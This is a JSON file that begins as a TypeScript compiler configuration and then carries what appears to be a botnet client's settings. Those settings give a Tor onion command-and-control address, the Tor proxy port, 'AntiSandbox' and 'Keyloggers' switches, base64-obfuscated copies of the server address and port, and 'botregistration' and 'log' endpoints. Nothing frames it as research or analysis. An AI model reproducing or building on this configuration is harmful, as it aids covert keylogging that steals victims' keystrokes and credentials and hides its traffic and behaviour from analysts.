{
  "compilerOptions": {
    "noImplicitAny": false,
    "noEmitOnError": true,
    "removeComments": false,
    "sourceMap": true,
    "target": "es5"
  },
  "exclude": [
    "node_modules",
    "wwwroot"
  ],
  "Variables": {
    "Debug": true,
    "Address": "u3pnecjj63qycnhl.onion",
    "FallbackAdress": "",
    "CertifiedKey": "x9ltmw6nnt",
    "SocketPort": 9150,
    "ServerReachPort": 5000,
    "FallbackServerReachPort": 5000,
    "ReachPort": 50371,
    "ListenerPort": 5557,
    "AntiSandbox": true,
    "Keyloggers": true,
    "WebMasterAddress": "dTNwbmVjamo2M3F5Y25obC5vbmlvbg==",
    "WebMasterPort": "MzQzNDMzMzUzOQ=="
  },
  "UrlVariables": {
    "RegistrationUrl": "botregistration",
    "LogUrl": "log"
  },
  "WebFilters": [
    "https://google.hu/",
    "https://youtube.com/",
    "https://stackoverflow.com/",
    "https://github.com/"
  ] 
}
